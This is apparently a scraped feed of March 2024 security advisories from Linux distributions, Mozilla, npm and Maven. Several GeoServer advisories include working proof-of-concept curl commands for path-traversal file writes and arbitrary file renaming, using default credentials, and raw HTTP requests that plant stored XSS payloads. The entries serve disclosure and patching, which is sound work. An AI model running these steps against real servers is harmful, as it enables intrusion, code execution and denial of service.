Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/gnutls-3.8.4-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/gnutls-3.8.4-x86_64-1.txzMD5 signaturesSlackware 15.0 package:2ed3c47691977050c7f0f0b696a922a9 gnutls-3.8.4-i586-1_slack15.0.txzSlackware x86_64 15.0 package:2f7109962a61f3a83112e1477ef4df94 gnutls-3.8.4-x86_64-1_slack15.0.txzSlackware -current package:105f92ad0cf3382774f7c987b983f31a n/gnutls-3.8.4-i586-1.txzSlackware x86_64 -current package:6c66cf1248836f79d270bdbfc292f26d n/gnutls-3.8.4-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg gnutls-3.8.4-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-079-01
19.03.2024 23:00:37	ubuntu	[USN-6702-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6702-1
20.03.2024 00:15:09	npm	[NPM:GHSA-6HH7-46R2-VF29] Server crashes on invalid Cloud Function or Cloud Job name (critical)	### ImpactCalling an invalid Parse Server Cloud Function name or Cloud Job name crashes server and may allow for code injection.### PatchesAdded string sanitation for Cloud Function name and Cloud Job name.### WorkaroundsSanitize the Cloud Function name and Cloud Job name before it reaches Parse Server.### References- https://github.com/parse-community/parse-server/security/advisories/GHSA-6hh7-46r2-vf29- https://github.com/parse-community/parse-server/releases/tag/7.0.0-alpha.29 (Fix for Parse Server 7 alpha)- https://github.com/parse-community/parse-server/releases/tag/6.5.5 (Fix for Parse Server 6 LTS)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6HH7-46R2-VF29
19.03.2024 21:02:21	ubuntu	[USN-6681-4] Linux kernel (AWS) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6681-4
19.03.2024 17:27:23	ubuntu	[USN-6686-3] Linux kernel (Oracle) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6686-3
19.03.2024 16:49:49	ubuntu	[USN-6680-3] Linux kernel (AWS) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6680-3
19.03.2024 14:15:07	alpinelinux	[ALPINE:CVE-2023-5388] nss vulnerability	[From CVE-2023-5388] NSS was susceptible to a timing side-channel attack when performing RSA decryption. This attack could potentially allow an attacker to recover the private data. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-5388
19.03.2024 02:00:00	debian	[DSA-5641-1] fontforge	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5641-1
19.03.2024 02:00:00	mozilla	[MFSA-2024-12] Security Vulnerabilities fixed in Firefox 124 (high)	- CVE-2023-5388: NSS susceptible to timing attack against RSA decryption (moderate)NSS was susceptible to a timing side-channel attack when performing RSA decryption. This attack could potentially allow an attacker to recover the private data.- CVE-2024-2605: Windows Error Reporter could be used as a Sandbox escape vector (high)An attacker could have leveraged the Windows Error Reporter to run arbitrary code on the system escaping the sandbox. Note: This issue only affected Windows operating systems. Other operating systems are unaffected.- CVE-2024-2606: Mishandling of WASM register values (high)Passing invalid data could have led to invalid wasm values being created, such as arbitrary integers turning into pointer values.- CVE-2024-2607: JIT code failed to save return registers on Armv7-A (high)Return registers were overwritten which could have allowed an attacker to execute arbitrary code. Note: This issue only affected Armv7-A systems. Other operating systems are unaffected.- CVE-2024-2608: Integer overflow could have led to out of bounds write (high)<code>AppendEncodedAttributeValue(), ExtraSpaceNeededForAttrEncoding()</code> and <code>AppendEncodedCharacters()</code> could have experienced integer overflows, causing underallocation of an output buffer leading to an out of bounds write.- CVE-2024-2609: Permission prompt input delay could expire when not in focus (moderate)The permission prompt input delay could have expired while the window is not in focus, which made the prompt vulnerable to clickjacking by malicious websites.- CVE-2024-2610: Improper handling of html and body tags enabled CSP nonce leakage (moderate)Using a markup injection an attacker could have stolen nonce values. This could have been used to bypass strict content security policies.- CVE-2024-2611: Clickjacking vulnerability could have led to a user accidentally granting permissions (moderate)A missing delay on when pointer lock was used could have allowed a malicious page to trick a user into granting permissions.- CVE-2024-2612: Self referencing object could have potentially led to a use-after-free (moderate)If an attacker could find a way to trigger a particular code path in <code>SafeRefPtr</code>, it could have triggered a crash or potentially be leveraged to achieve code execution.- CVE-2024-2613: Improper handling of QUIC ACK frame data could have led to OOM (low)Data was not properly sanitized when decoding a QUIC ACK frame; this could have led to unrestricted memory consumption and a crash.- CVE-2024-2614: Memory safety bugs fixed in Firefox 124, Firefox ESR 115.9, and Thunderbird 115.9 (high)Memory safety bugs present in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.- CVE-2024-2615: Memory safety bugs fixed in Firefox 124 (critical)Memory safety bugs present in Firefox 123. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-12
19.03.2024 02:00:00	mozilla	[MFSA-2024-13] Security Vulnerabilities fixed in Firefox ESR 115.9 (high)	- CVE-2023-5388: NSS susceptible to timing attack against RSA decryption (moderate)NSS was susceptible to a timing side-channel attack when performing RSA decryption. This attack could potentially allow an attacker to recover the private data.- CVE-2024-0743: Crash in NSS TLS method (high)An unchecked return value in TLS handshake code could have caused a potentially exploitable crash.- CVE-2024-2605: Windows Error Reporter could be used as a Sandbox escape vector (high)An attacker could have leveraged the Windows Error Reporter to run arbitrary code on the system escaping the sandbox. Note: This issue only affected Windows operating systems. Other operating systems are unaffected.- CVE-2024-2607: JIT code failed to save return registers on Armv7-A (high)Return registers were overwritten which could have allowed an attacker to execute arbitrary code. Note: This issue only affected Armv7-A systems. Other operating systems are unaffected.- CVE-2024-2608: Integer overflow could have led to out of bounds write (high)<code>AppendEncodedAttributeValue(), ExtraSpaceNeededForAttrEncoding()</code> and <code>AppendEncodedCharacters()</code> could have experienced integer overflows, causing underallocation of an output buffer leading to an out of bounds write.- CVE-2024-2610: Improper handling of html and body tags enabled CSP nonce leakage (moderate)Using a markup injection an attacker could have stolen nonce values. This could have been used to bypass strict content security policies.- CVE-2024-2611: Clickjacking vulnerability could have led to a user accidentally granting permissions (moderate)A missing delay on when pointer lock was used could have allowed a malicious page to trick a user into granting permissions.- CVE-2024-2612: Self referencing object could have potentially led to a use-after-free (moderate)If an attacker could find a way to trigger a particular code path in <code>SafeRefPtr</code>, it could have triggered a crash or potentially be leveraged to achieve code execution.- CVE-2024-2614: Memory safety bugs fixed in Firefox 124, Firefox ESR 115.9, and Thunderbird 115.9 (high)Memory safety bugs present in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.- CVE-2024-2616: Improve handling of out-of-memory conditions in ICU (high)To harden ICU against exploitation, the behavior for out-of-memory conditions was changed to crash instead of attempt to continue.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-13
19.03.2024 02:00:00	mozilla	[MFSA-2024-14] Security Vulnerabilities fixed in Thunderbird 115.9 (high)	In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-14
19.03.2024 02:00:00	oraclelinux	[ELSA-2024-12232] openssh security update (moderate)	[7.4p1-23.0.3_fips]- Change Epoch from 1 to 10- Enable fips KDF POST [Orabug: 32461750]- Disable diffie-hellman-group-exchange-sha256 KEX FIPS method [Orabug: 32461739][7.4p1-23.0.3]- add KEX_INITIAL flag [Orabug: 36160445]- implement 'strict key exchange' [CVE-2023-48795][Orabug: 36160445]	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12232
19.03.2024 02:00:00	redhat	[RHSA-2024:1375] squid:4 security update (important)	Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: denial of service in HTTP header parser (CVE-2024-25617)* squid: Denial of Service in HTTP Chunked Decoding (CVE-2024-25111)* squid: denial of service in HTTP request parsing (CVE-2023-50269)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1375
19.03.2024 02:00:00	redhat	[RHSA-2024:1376] squid security update (important)	Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: denial of service in HTTP header parser (CVE-2024-25617)* squid: Denial of Service in HTTP Chunked Decoding (CVE-2024-25111)* squid: denial of service in HTTP request parsing (CVE-2023-50269)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1376
19.03.2024 02:00:00	redhat	[RHSA-2024:1431] ruby:3.1 security, bug fix, and enhancement update (moderate)	Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.The following packages have been upgraded to a later upstream version: ruby (3.1). (RHEL-28565)Security Fix(es):* ruby/cgi-gem: HTTP response splitting in CGI (CVE-2021-33621)* ruby: ReDoS vulnerability in URI (CVE-2023-28755)* ruby: ReDoS vulnerability - upstream's incomplete fix for CVE-2023-28755 (CVE-2023-36617)* ruby: ReDoS vulnerability in Time (CVE-2023-28756)Bug Fix(es):* ruby/rubygem-irb: IRB has hard dependency on rubygem-rdoc (RHEL-28569)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1431
19.03.2024 02:00:00	redhat	[RHSA-2024:1427] libreoffice security update (important)	LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* CVE-2023-6186 libreoffice: various flaws (JIRA:RHEL-20657)* CVE-2023-6185 libreoffice: various flaws (JIRA:RHEL-20657)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1427
19.03.2024 01:57:25	ubuntu	[USN-6700-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6700-1
19.03.2024 01:43:16	ubuntu	[USN-6701-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6701-1
19.03.2024 01:07:09	ubuntu	[USN-6699-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6699-1
19.03.2024 01:12:42	rubysec	[RUBYSEC:ROTP-2024-28862] ROTP 6.2.2 and 6.2.1 has 0666 permissions for the .rb files. (medium)	The Ruby One Time Password library (ROTP) is an open source libraryfor generating and validating one time passwords. Affected versionshad overly permissive default permissions. Users should patch toversion 6.3.0. Users unable to patch may correct file permissionsafter installation.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ROTP-2024-28862
21.03.2024 09:00:00	msrc	[MS:CVE-2024-29057] Microsoft Edge (Chromium-based) Spoofing Vulnerability (unknown)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-29057
21.03.2024 00:30:12	ubuntu	[USN-6702-2] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6702-2
21.03.2024 00:11:52	ubuntu	[USN-6701-2] Linux kernel (GCP) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6701-2
20.03.2024 23:14:26	slackware	[SSA:2024-080-01] python3 (high)	New python3 packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/python3-3.9.19-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: bundled libexpat was updated to 2.6.0. zipfile is now protected from the "quoted-overlap" zipbomb. tempfile.TemporaryDirectory cleanup no longer dereferences symlinks when working around file system permission errors. For more information, see: https://pythoninsider.blogspot.com/2024/03/python-31014-3919-and-3819-is-now.html https://www.cve.org/CVERecord?id=CVE-2023-52425 https://www.cve.org/CVERecord?id=CVE-2024-0450 https://www.cve.org/CVERecord?id=CVE-2023-6597 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/python3-3.9.19-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/python3-3.9.19-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/python3-3.9.19-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/python3-3.9.19-x86_64-1.txzMD5 signaturesSlackware 15.0 package:7081105ba6776152ac3b7106f1d39b18 python3-3.9.19-i586-1_slack15.0.txzSlackware x86_64 15.0 package:473fbc6c3cf937f8f9839113ade8afa8 python3-3.9.19-x86_64-1_slack15.0.txzSlackware -current package:a59b0adbca9785605159767489cbe6e5 d/python3-3.9.19-i586-1.txzSlackware x86_64 -current package:3b7c17fff3d5f99e8cfae5880c8a8dbb d/python3-3.9.19-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg python3-3.9.19-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-080-01
20.03.2024 20:30:45	ubuntu	[USN-6707-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6707-1
20.03.2024 19:44:27	ubuntu	[USN-6706-1] Linux kernel (OEM) vulnerability (medium)	The system could be made to crash under certain conditions.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6706-1
20.03.2024 19:09:04	maven	[MAVEN:GHSA-X637-X8P3-5P22] Improper Authentication in Spring Authorization Server (moderate)	Spring Authorization Server versions 1.0.0 - 1.0.5, 1.1.0 - 1.1.5, 1.2.0 - 1.2.2 and older unsupported versions are susceptible to a PKCE Downgrade Attack for Confidential Clients.Specifically, an application is vulnerable when a Confidential Client uses PKCE for the Authorization Code Grant.An application is not vulnerable when a Public Client uses PKCE for the Authorization Code Grant.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-X637-X8P3-5P22
20.03.2024 23:03:47	maven	[MAVEN:GHSA-88WC-FCJ9-Q3R9] GeoServer's GWC Demos Page vulnerable to Stored Cross-Site Scripting (XSS) (moderate)	### SummaryA stored cross-site scripting (XSS) vulnerability exists that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the GWC Demos Page. Access to the GWC Demos Page is available to all users although data security may limit users' ability to trigger the XSS.### ImpactIf an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:1 .Perform any action within the application that the user can perform.2. View any information that the user is able to view.3. Modify any information that the user is able to modify.4. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.### Referenceshttps://github.com/GeoWebCache/geowebcache/issues/1171https://github.com/GeoWebCache/geowebcache/pull/1173	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-88WC-FCJ9-Q3R9
20.03.2024 23:03:48	maven	[MAVEN:GHSA-7X76-57FR-M5R5] GeoServer's MapML HTML Page vulnerable to Stored Cross-Site Scripting (XSS) (moderate)	### SummaryA stored cross-site scripting (XSS) vulnerability exists that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the MapML HTML Page. The MapML extension must be installed and access to the MapML HTML Page is available to all users although data security may limit users' ability to trigger the XSS.### ImpactIf an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:1 .Perform any action within the application that the user can perform.2. View any information that the user is able to view.3. Modify any information that the user is able to modify.4. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.### Referenceshttps://osgeo-org.atlassian.net/browse/GEOS-11154https://github.com/geoserver/geoserver/pull/7175	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7X76-57FR-M5R5
20.03.2024 23:03:52	maven	[MAVEN:GHSA-FCPM-HCHJ-MH72] GeoServer's WMS OpenLayers Format vulnerable to Stored Cross-Site Scripting (XSS) (moderate)	### SummaryA stored cross-site scripting (XSS) vulnerability exists that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the WMS GetMap OpenLayers Output Format. Access to the WMS OpenLayers Format is available to all users by default although data and service security may limit users' ability to trigger the XSS.### ImpactIf an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:1 .Perform any action within the application that the user can perform.2. View any information that the user is able to view.3. Modify any information that the user is able to modify.4. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.### Referenceshttps://osgeo-org.atlassian.net/browse/GEOS-11153https://github.com/geoserver/geoserver/pull/7174	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FCPM-HCHJ-MH72
20.03.2024 23:03:57	maven	[MAVEN:GHSA-56R3-F536-5GF7] GeoServer's GWC Seed Form vulnerable to Stored Cross-Site Scripting (XSS) (moderate)	### SummaryA stored cross-site scripting (XSS) vulnerability exists that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another administrator’s browser when viewed in the GWC Seed Form. Access to the GWC Seed Form is limited to full administrators by default and granting non-administrators access to this endpoint is not recommended.### Details_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._### PoC_Complete instructions, including specific configuration details, to reproduce the vulnerability._### ImpactIf an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:1 .Perform any action within the application that the user can perform.2. View any information that the user is able to view.3. Modify any information that the user is able to modify.4. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.### Referenceshttps://github.com/GeoWebCache/geowebcache/issues/1172https://github.com/GeoWebCache/geowebcache/pull/1174	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-56R3-F536-5GF7
20.03.2024 23:03:58	maven	[MAVEN:GHSA-FG9V-56HW-G525] GeoServer's Simple SVG Renderer vulnerable to Stored Cross-Site Scripting (XSS) (moderate)	### SummaryA stored cross-site scripting (XSS) vulnerability exists that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the WMS GetMap SVG Output Format when the Simple SVG renderer is enabled. Access to the WMS SVG Format is available to all users by default although data and service security may limit users' ability to trigger the XSS.### Details_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._### PoC_Complete instructions, including specific configuration details, to reproduce the vulnerability._### ImpactIf an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:1 .Perform any action within the application that the user can perform.2. View any information that the user is able to view.3. Modify any information that the user is able to modify.4. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.### Referenceshttps://osgeo-org.atlassian.net/browse/GEOS-11152https://github.com/geoserver/geoserver/pull/7173	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FG9V-56HW-G525
20.03.2024 23:04:02	maven	[MAVEN:GHSA-9RFR-PF2X-G4XF] GeoServer's Style Publisher vulnerable to Stored Cross-Site Scripting (XSS) (moderate)	### SummaryA stored cross-site scripting (XSS) vulnerability exists that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in uploaded style/legend resources or in a specially crafted datastore file that will execute in the context of another user's browser when viewed in the Style Publisher. Access to the Style Publisher is available to all users although data security may limit users' ability to trigger the XSS.### Details_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._### PoC_Complete instructions, including specific configuration details, to reproduce the vulnerability._### ImpactIf an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:1 .Perform any action within the application that the user can perform.2. View any information that the user is able to view.3. Modify any information that the user is able to modify.4. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.### Referenceshttps://osgeo-org.atlassian.net/browse/GEOS-11149https://github.com/geoserver/geoserver/pull/7162https://osgeo-org.atlassian.net/browse/GEOS-11155https://github.com/geoserver/geoserver/pull/7181	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9RFR-PF2X-G4XF
20.03.2024 23:04:07	maven	[MAVEN:GHSA-75M5-HH4R-Q9GX] GeoServer Arbitrary file renaming vulnerability in REST Coverage/Data Store API (moderate)	### SummaryAn arbitrary file renaming vulnerability exists that enables an authenticated administrator with permissions to modify stores through the REST Coverage Store or Data Store API to rename arbitrary files and directories with a name that does not end in ".zip".### DetailsStore file uploads rename zip files to have a ".zip" extension if it doesn't already have one before unzipping the file. This is fine for file and url upload methods where the files will be in a specific subdirectory of the data directory but, when using the external upload method, this allows arbitrary files and directories to be renamed.### PoCCoverage Store Example (workspace and store name are irrelevant and any valid coverage format can be used):curl -XPUT -H"Content-Type:application/zip" -u"admin:geoserver" -d"/file/to/move" "http://localhost:8080/geoserver/rest/workspaces/a/coveragestores/b/external.geotiff"Data Store Example (workspace and store name and data store format are irrelevant):curl -XPUT -H"Content-Type:application/zip" -u"admin:geoserver" -d"/file/to/move" "http://localhost:8080/geoserver/rest/workspaces/a/datastores/b/external.c"### ImpactRenaming GeoServer files will most likely result in a denial of service, either completely preventing GeoServer from running or effectively deleting specific resources (such as a workspace, layer or style). In some cases, renaming GeoServer files could revert to the default settings for that file which could be relatively harmless like removing contact information or have more serious consequences like allowing users to make OGC requests that the customized settings would have prevented them from making. The impact of renaming non-GeoServer files depends on the specific environment although some sort of denial of service is a likely outcome.### Referenceshttps://osgeo-org.atlassian.net/browse/GEOS-11213https://github.com/geoserver/geoserver/pull/7289	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-75M5-HH4R-Q9GX
20.03.2024 23:04:12	maven	[MAVEN:GHSA-FH7P-5F6G-VJ2W] Stored Cross-Site Scripting (XSS) vulnerability in GeoServer's REST Resources API (moderate)	### SummaryA stored cross-site scripting (XSS) vulnerability exists that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in uploaded style/legend resources that will execute in the context of another administrator's browser when viewed in the REST Resources API. Access to the REST Resources API is limited to full administrators by default and granting non-administrators access to this endpoint should be carefully considered as it may allow access to files containing sensitive information.### DetailsUpload a new Legend via the New Style page if user has permissions for this. This file is then not checked and is uploaded to the backend system. This file can then be viewed directly by requesting it via the API which will then view the file in its raw format without sanitisation.![image](https://user-images.githubusercontent.com/6471928/232732469-7dbf2776-5712-4c68-bd12-e2403c136a7c.png)![image](https://user-images.githubusercontent.com/6471928/232732832-4fe2337f-9b28-41b1-9181-24abff4a6973.png)### PoC1 .User makes the following request to upload file.```POST /geoserver/web/wicket/bookmarkable/org.geoserver.wms.web.data.StyleNewPage?11-1.IBehaviorListener.0-dialog-dialog-content-form-submit&wicket-ajax=true&wicket-ajax-baseurl=wicket%2Fbookmarkable%2Forg.geoserver.wms.web.data.StyleNewPage%3F11 HTTP/1.1Host: geoserver:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------37957706701641834739220342753Content-Length: 619Connection: closeUpgrade-Insecure-Requests: 1-----------------------------37957706701641834739220342753Content-Disposition: form-data; name="id89_hf_0"-----------------------------37957706701641834739220342753Content-Disposition: form-data; name="userPanel:image"-----------------------------37957706701641834739220342753Content-Disposition: form-data; name="userPanel:upload"; filename="test.html"Content-Type: text/html<script>alert(document.cookie)</script>-----------------------------37957706701641834739220342753Content-Disposition: form-data; name="p::submit"1-----------------------------37957706701641834739220342753--```2. File is uploaded to the backend system and is viewable via the API at - /geoserver/rest/resourse/styles as per the screenshot above.3. If admin user views this file the Javascript is executed and this could be used to craft a payload to steal the user's cookies(as these do not currently use HTTPOnly)![image](https://user-images.githubusercontent.com/6471928/232733694-5a994b08-53e4-4cd0-a20e-ec8717537e26.png)Alternatively -If the user has permissions to use the API to make PUT requests then they can directly upload malicious files as per a request below. This would be viewable in the same way as above.PUT /geoserver/rest/resource/styles/test2.html HTTP/1.1Host: geoserver:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateAuthorization: Basic YWRtaW46Z2Vvc2VydmVy (admin:geoserver default credentials)Connection: closeUpgrade-Insecure-Requests: 1Content-Type: text/htmlContent-Length: 29<script>alert(1)</script>### ImpactIf an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:1 .Perform any action within the application that the user can perform.2. View any information that the user is able to view.3. Modify any information that the user is able to modify.4. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.### Referenceshttps://osgeo-org.atlassian.net/browse/GEOS-11148https://github.com/geoserver/geoserver/pull/7161	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FH7P-5F6G-VJ2W
20.03.2024 17:44:00	maven	[MAVEN:GHSA-9V5Q-2GWQ-Q9HQ] Arbitrary file upload vulnerability in GeoServer's REST Coverage Store API (high)	### SummaryAn arbitrary file upload vulnerability exists that enables an authenticated administrator with permissions to modify coverage stores through the REST Coverage Store API to upload arbitrary file contents to arbitrary file locations which can lead to remote code execution.### DetailsCoverage stores that are configured using relative paths use a GeoServer Resource implementation that has validation to prevent path traversal but coverage stores that are configured using absolute paths use a different Resource implementation that does not prevent path traversal.### PoCStep 1 (create sample coverage store):curl -vXPUT -H"Content-type:application/zip" -u"admin:geoserver" --data-binary @polyphemus.zip "http://localhost:8080/geoserver/rest/workspaces/sf/coveragestores/filewrite/file.imagemosaic"Step 2 (switch store to absolute URL):curl -vXPUT -H"Content-Type:application/xml" -u"admin:geoserver" -d"<coverageStore><url>file:///{absolute path to data directory}/data/sf/filewrite</url></coverageStore>" "http://localhost:8080/geoserver/rest/workspaces/sf/coveragestores/filewrite"Step 3 (upload arbitrary files):curl -vH"Content-Type:" -u"admin:geoserver" --data-binary @file/to/upload "http://localhost:8080/geoserver/rest/workspaces/sf/coveragestores/filewrite/file.a?filename=../../../../../../../../../../file/to/write"Steps 1 & 2 can be combined into a single POST REST call if local write access to anywhere on the the file system that GeoServer can read is possible (e.g., the /tmp directory).### ImpactThis vulnerability can lead to executing arbitrary code. An administrator with limited privileges could also potentially exploit this to overwrite GeoServer security files and obtain full administrator privileges.### Referenceshttps://osgeo-org.atlassian.net/browse/GEOS-11176https://github.com/geoserver/geoserver/pull/7222	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9V5Q-2GWQ-Q9HQ
20.03.2024 17:44:09	maven	[MAVEN:GHSA-8G7V-VJRC-X4G5] GeoServer log file path traversal vulnerability (high)	### ImpactThis vulnerability requires GeoServer Administrator with access to the admin console to misconfigured the Global Settings for log file location to an arbitrary location.This can be used to read files via the admin console GeoServer Logs page. It is also possible to leverage RCE or cause denial of service by overwriting key GeoServer files.### PatchesAs this issue requires GeoServer administrators access, often representing a trusted party, the vulnerability has not yet attracted a volunteer or resources.Interested parties are welcome to contact geoserver-security@lists.osgeo.org for recommendations on developing a fix.### WorkaroundsA system administrator responsible for running GeoServer can define the ``GEOSERVER_LOG_FILE`` parameter, preventing the global setting provided from being used.The ``GEOSERVER_LOG_LOCATION`` parameter can be set as system property, environment variable, or servlet context parameter.Environmental variable:```bashexport GEOSERVER_LOG_LOCATION=/var/opt/geoserver/logs```System property:```bash-DGEOSERVER_LOG_LOCATION=/var/opt/geoserver/logs```Web application ``WEB-INF/web.xml``:```xml <context-param> <param-name> GEOSERVER_LOG_LOCATION </param-name> <param-value>/var/opt/geoserver/logs</param-value> </context-param>```Tomcat conf/Catalina/localhost/geoserver.xml:```xml<Context> <Parameter name="GEOSERVER_LOG_LOCATION" value="/var/opt/geoserver/logs" override="false"/></Context>```### References* [Log location](https://docs.geoserver.org/latest/en/user/configuration/globalsettings.html#log-location) (User Manual)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8G7V-VJRC-X4G5
20.03.2024 16:30:19	ubuntu	[USN-6705-1] Linux kernel (AWS) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6705-1
